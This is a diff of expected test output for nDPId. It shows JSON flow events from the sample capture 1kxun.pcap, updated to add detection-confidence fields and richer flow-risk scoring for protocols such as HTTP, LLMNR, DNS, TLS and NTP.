 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Media"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Streaming"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"}}
 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
